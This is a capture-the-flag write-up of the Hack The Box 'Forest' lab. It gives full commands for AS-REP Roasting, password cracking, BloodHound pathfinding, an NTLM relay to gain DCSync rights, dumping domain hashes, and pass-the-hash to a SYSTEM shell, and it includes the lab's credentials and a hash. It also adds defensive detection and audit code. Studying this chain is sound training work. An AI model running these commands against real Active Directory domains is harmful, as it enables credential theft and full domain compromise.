5. Hack The Box Level Easy: Passing Forest. AS-REP Roasting

9 December 2024 8 minutes Author: Lady Liberty

This article covers key hacking techniques used during the Hack The Box “Forest” lab, including AS-REP Roasting, DCSync, and Pass-The-Hash attacks. These techniques are important steps in pentesting and can be used to attack Windows network services.

Step-by-step guide to penetrating “Forest”

This continues the series of write-ups for machines on the HackTheBox platform; this one also covers the Pass-The-Hash attack. Labs are performed over a VPN connection. It is recommended not to connect from work devices or computers that hold important data, since you are joining a private network shared with users who have deep knowledge of information security.

Recon

This machine has an IP address of 10.10.10.161, which is added to the /etc/hosts file in the format:

10.10.10.161 forest.htb

First, a scan of open ports is performed. Since a full scan of all ports with nmap can be time-consuming, the process begins with a scan with masscan. This tool is used to scan all TCP and UDP ports from the tun0 interface, setting the rate to 1000 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.161 --rate=1000

A large number of open ports were found on the host, so we decided to check the results obtained with masscan for accuracy. To do this, an additional port scan was performed using nmap, which allowed us to clarify the status of the ports.

nmap 10.10.10.161 -p135,636,3269,49676,49665,53,593,49671,9389,49667,5985,49666,389,88,49684,464,3268,49677,47001,139,445,49714

nmap confirmed all of them. Next, we gather more information about the well-known ports that nmap confirmed.

nmap -A 10.10.10.161 -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001

The next step was to extract as much information as possible from the system. The enum4linux tool was used for this. The results were limited: the tool returned only minimal information such as groups, the password policy, the lack of SMBv1 support, and shared resources. It did, however, return a list of users, which is useful for the next steps.

enum4linux -a 10.10.10.161

Since the host is running Kerberos, you need to check whether any user account has the DONT_REQ_PREAUTH flag set in its userAccountControl (UAC) attribute. The DONT_REQ_PREAUTH flag means that the account does not require Kerberos pre-authentication.

First, you need to find out which user accounts are active. This can be done using the samrdump script included in the impacket package.

impacket-samrdump forest.htb

The script first displays all users, and then details about each of them. This way, you can see that the Administrator account is active, but the Guest account is not. Now we can list the active users.

Having a list of active users, you can check them for the required flag. To do this, use the GetNPUsers script, which is part of the impacket package. The run specifies the domain htb.local, the IP address of the domain controller 10.10.10.161, Kerberos authentication (option -k), no password (option -no-pass), and the file with the list of users (option -usersfile). This shows which accounts in the domain have the flag set.

GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -k -no-pass -usersfile ADUsers.txt

The flag is reported absent for all users except svc-alfresco. In the impacket version used here (21-dev), the script automatically requests the hash as soon as the check finds such an account. This greatly simplifies obtaining the data needed for the next step against the svc-alfresco account.

Entry Point – AS-REP Roasting

The AS-REP Roasting hash has been obtained. Below is the Kerberos authentication scheme.

In the first step, the client sends a message with the user ID to the authentication server (AS), requesting a service on behalf of the user. The AS derives the user's secret key from the hash of the user's password, which it holds in its database, and uses that key to encrypt part of its reply (the AS-REP).

Because the account does not require pre-authentication, this encrypted reply can be obtained without knowing the password, and candidate passwords can then be tried against it offline until one decrypts it. This is the basis of the AS-REP Roasting attack. The hash is saved to a file, and the password that produced it (its preimage) is searched for with a wordlist.

john --wordlist=./rockyou.txt hashes2.txt

We find the user’s password.
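The two defender-side checks that correspond to this step, as an added example that is not part of the original write-up: an audit of the userAccountControl bit that makes an account roastable, and a detection over Security Event 4768 records for TGTs issued without pre-authentication. The event records, client addresses and the second account name are constructed; svc-alfresco is the account from the lab.

```python
# Added example (not from the original write-up): defender-side checks for the
# AS-REP Roasting path used on Forest. Sample data below is constructed.
import re
from typing import Dict, List

# userAccountControl bits: "Do not require Kerberos preauthentication" and "disabled".
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002

def roastable_accounts(uac_by_user: Dict[str, int]) -> List[str]:
    """Return enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set."""
    return sorted(
        user for user, uac in uac_by_user.items()
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE
    )

# Constructed Security Event 4768 (TGT request) records, one string per event.
# Pre-Authentication Type 0 = no pre-auth; Ticket Encryption Type 0x17 = RC4-HMAC.
SAMPLE_4768 = [
    "Account Name: svc-alfresco\nSupplied Realm Name: HTB.LOCAL\n"
    "Client Address: ::ffff:10.10.14.5\nTicket Encryption Type: 0x17\n"
    "Pre-Authentication Type: 0\nResult Code: 0x0",
    "Account Name: jdoe\nSupplied Realm Name: HTB.LOCAL\n"
    "Client Address: ::ffff:10.10.10.50\nTicket Encryption Type: 0x12\n"
    "Pre-Authentication Type: 2\nResult Code: 0x0",
]

def parse_event(text: str) -> Dict[str, str]:
    """Parse the 'Field: value' lines of a rendered Windows event into a dict."""
    return dict(re.findall(r"^([^:\n]+):\s*(.*)$", text, re.MULTILINE))

def detect_asrep_roasting(events: List[str]) -> List[Dict[str, object]]:
    """Flag successful TGT requests issued without pre-authentication.

    Pre-auth type 0 combined with RC4 (0x17) is the classic tooling signature;
    pre-auth type 0 alone is still worth reviewing, so both are reported."""
    hits = []
    for raw in events:
        ev = parse_event(raw)
        if ev.get("Pre-Authentication Type") != "0" or ev.get("Result Code") != "0x0":
            continue
        hits.append({
            "user": ev["Account Name"],
            "client": ev["Client Address"],
            "rc4": ev.get("Ticket Encryption Type") == "0x17",
        })
    return hits
```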

USER

If we go back to the open ports, we can see that WinRM (Windows Remote Management), a service intended for remote administration, is running. We can therefore connect to it with the recovered credentials.

This gives us the user flag.

ROOT

Intelligence with BloodHound

To elevate privileges in a domain, you can use the BloodHound tool, which allows you to determine the paths for LPE (local privilege escalation).

Evil-winrm can both upload files to and download files from the target host. To collect information, the SharpHound collector, which is part of the BloodHound toolkit, was uploaded to the host.

Evil-winrm also allows you to run PowerShell scripts. When running the collector, you can pass user credentials and a password, and specify what information you want to collect: for example, complete information about available objects, services, or privileges on the system.

After executing the script, a zip archive will appear in the current directory. We download it from the host.

Next, we will launch the neo4j graph DBMS, which BloodHound works with.

neo4j console

Now let’s launch BloodHound. We will be greeted by a blank screen.

The downloaded archive is simply loaded into the program. After that, we switch to the Queries tab to analyse the collected data.

After that, a query is specified to find the shortest paths to the domain administrators. BloodHound automatically creates a graph that displays the sequential path of advancement. By clicking on each node in the graph, you can get detailed information about it and its connections in the network.

The path shows that to elevate privileges further, the account must become a member of the Exchange Windows Permissions group; this is possible because svc-alfresco belongs to the privileged Service Accounts group. Once that is done, the remaining steps to elevate access on the system can be performed.

net user svc-alfresco

The user is not currently a member of the Exchange Windows Permissions group. You must add them to this group to continue. After you complete this action, you can verify that the user was successfully added by viewing the list of their groups.

Add-ADGroupMember "Exchange Windows Permissions" svc-alfresco

The user has been successfully added to the Exchange Windows Permissions group. This group has the WriteDACL permission (the right to modify the access control list) on the Domain object in Active Directory. This allows members of the group to modify domain privileges, including granting the rights needed for DCSync operations, which give access to user data such as password hashes in the domain database.

DCSync

The DCSync attack exploits the Active Directory replication mechanism, which synchronizes changes made on one domain controller with others. Once the necessary permissions are obtained, a replication request can be initiated to extract data stored in Active Directory, including user password hashes.

This lets the attacker pull the password hashes of Active Directory accounts, after which it is possible to authenticate as those accounts to any service that accepts NTLM (Microsoft's network authentication protocol) or Kerberos.

The attack uses the privexchange.py and ntlmrelayx.py tools, which are part of the impacket package. First, ntlmrelayx.py is started in LDAP relay mode against the domain controller with svc-alfresco as the account to escalate. This lets it relay an incoming authentication to LDAP and use that session to grant svc-alfresco the privileges the attack needs.

ntlmrelayx.py -t ldap://htb.local --escalate-user svc-alfresco

The relay listeners are running and waiting for a connection. Now we run privexchange.

python privexchange.py 10.10.10.161 -ah <our_ip> -d htb.local -u svc-alfresco -p s3rvice

The command produced many errors. After a short analysis, it was decided not to fix them by hand. Alternatively, you can use a browser: open the specified link and perform HTTP authentication with the svc-alfresco credentials. The ntlmrelayx window then displays the connection information, which lets you continue the attack or obtain the necessary data.

Now let’s perform a DCSync attack using secretsdump.

secretsdump.py htb.local/svc-alfresco:s3rvice@10.10.10.161 -just-dc

Great, the hashes of all accounts were replicated.

Pass-the-hash attack

This attack allows an attacker to gain access to a remote server where authentication is performed using the NTLM or LM protocols. In systems that use NTLM, passwords are not transmitted in the clear; instead, a challenge-response scheme is used during the authentication phase, where password hashes are transmitted.

In Windows, applications receive the password in the clear from the user and then call an API such as LsaLogonUser, which converts the password into LM and NTLM hashes that are used for authentication. Analysis of the protocol shows that the password hash alone is sufficient to authenticate, without knowing the password in the clear.

A weakness in the protocol implementation is that the hashes are transmitted without a salt, so they remain constant between sessions until the user changes the password. For the attacker, this means that the hash is equivalent to the password itself.

The attack will use the psexec tool, which allows access and execution of commands on the remote server using the obtained password hash.

psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 [email protected]

We now have a shell as SYSTEM with full rights, which allows any operation on the remote server, including changing configurations, managing user accounts, and viewing confidential data.
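The practical consequence of the unsalted-hash point above, as an added example that is not part of the original write-up: in a dump in secretsdump's NTDS format, accounts that share a password share one NT hash, and well-known hashes (the empty password, a stored LM hash) are recognisable on sight. All hash values and account names other than Administrator, Guest and svc-alfresco are constructed.

```python
# Added example (not from the original write-up): audit a secretsdump-style dump
# for what unsalted, static NT hashes give away. All hash values are constructed.
from collections import defaultdict
from typing import Dict, List

# Well-known constants: the "no LM hash stored" value and the NT hash of "".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed lines in secretsdump's NTDS format: domain\user:rid:lmhash:nthash:::
SAMPLE_DUMP = """\
htb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
htb.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
htb.local\\helpdesk:1150:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
htb.local\\legacy:1151:0123456789abcdef0123456789abcdef:33333333333333333333333333333333:::
[*] Cleaning up...
"""

def parse_dump(text: str) -> List[Dict[str, str]]:
    """Parse NTDS lines into records; tool chatter and malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or len(parts[2]) != 32 or len(parts[3]) != 32:
            continue
        records.append({"user": parts[0].split("\\")[-1], "rid": parts[1],
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return records

def audit_hashes(text: str) -> Dict[str, list]:
    """Report findings that exist only because NT hashes carry no salt:
    identical passwords collapse to one hash, and known hashes are identifiable."""
    by_nt = defaultdict(list)
    findings = {"empty_password": [], "lm_hash_stored": [], "shared_password": []}
    for rec in parse_dump(text):
        by_nt[rec["nt"]].append(rec["user"])
        if rec["nt"] == EMPTY_NT:
            findings["empty_password"].append(rec["user"])
        if rec["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(rec["user"])
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:  # one group of users per reused hash
            findings["shared_password"].append(sorted(users))
    return findings
```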
